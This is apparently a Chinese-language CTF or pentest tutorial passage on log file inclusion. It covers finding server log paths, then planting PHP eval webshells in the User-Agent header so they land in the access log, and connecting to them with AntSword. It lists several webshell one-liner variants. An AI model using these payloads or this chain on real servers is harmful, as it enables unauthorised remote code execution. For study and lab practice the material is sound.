0x07 日志文件包含
判断类型
使用kali
curl -I url
F12
打开F12开发者工具,选中之后F5刷新查看server类型即可
配置文件
直接包含或者访问如果有回显就是,
NGINX:NGINX 的配置文件通常位于 /etc/nginx/ 目录下,具体的网站配置文件通常位于 /etc/nginx/sites-available/ 或 /etc/nginx/conf.d/ 目录中。
在配置文件中查找 server 块,通常可以看到 NGINX 特有的配置语法和指令。
Apache:Apache 的配置文件通常位于 /etc/apache2/ 目录下,具体的网站配置文件通常位于 /etc/apache2/sites-available/ 或 /etc/httpd/conf.d/ 目录中。
在配置文件中查找 <VirtualHost> 或者其他 Apache 特有的指令和语法,如 ServerName 等。
直接包含着试试看
nginx
默认日志文件路径为/var/log/nginx/
access.log: 记录所有访问服务器的请求,包括请求的时间、客户端IP、请求方法、请求的URL路径、HTTP协议版本、服务器响应状态码等信息。
error.log: 记录NGINX服务器发生的错误信息,如配置错误、客户端请求错误、服务器运行问题等。
apache
/var/log/apache2/ 或 /var/log/httpd/
access.log: 记录所有访问服务器的请求。
error.log: 记录 Apache 服务器发生的错误信息。
修改UA头
headers里面有一个是User-Agent
在HTTP请求中,User-Agent的作用包括但不限于以下几点:
标识客户端类型和版本:服务器可以根据User-Agent头部识别出请求的客户端是哪种类型的应用程序(比如浏览器、爬虫程序等)以及其版本号。
适配内容:网站服务器可以根据不同的User-Agent头部,向不同的客户端提供适配的内容。这样可以实现根据设备类型或浏览器能力提供定制化的页面。
统计和分析:网站可以根据User-Agent头部分析访问者的设备和浏览器偏好,用于统计和分析访问数据。
安全性:有时候User-Agent头部也用于安全验证或识别恶意请求,虽然User-Agent可以被伪造或修改,但它仍然是HTTP请求中的一部分,可以作为辅助信息进行安全分析。
然后我们在其中添加小🐎
<?php eval($_POST[1]);?>
<?php eval($_POST["1"]);?>
<?php eval($_POST['1']);?>
<?php @eval($_POST[1]);?>
<?php @eval(\$_POST[1]);?>
<?=eval($_POST[1]);?>
<?=eval($_POST[/**/1]);?>
还有很多其他的马,嗯就不多说了,后面会写篇专题我研究研究
\作用是转义,@是防报错,论环境来定小🐎
进行命令执行即可
如果是$_POST
进行POST传参就行
如果是$_GET
进行GET传参就行
但是有种情况就是文件路径太难找了,甚至你找不到,那么就需要工具了,比如antsword
antsword
安装不说了,简单说说如何使用
右键,添加数据,然后
输入包含🐎的url以及你的链接密码
测试链接成功即可进入
当然也可以进入虚拟终端
还可以数据管理(猜弱口令)
先检测然后链接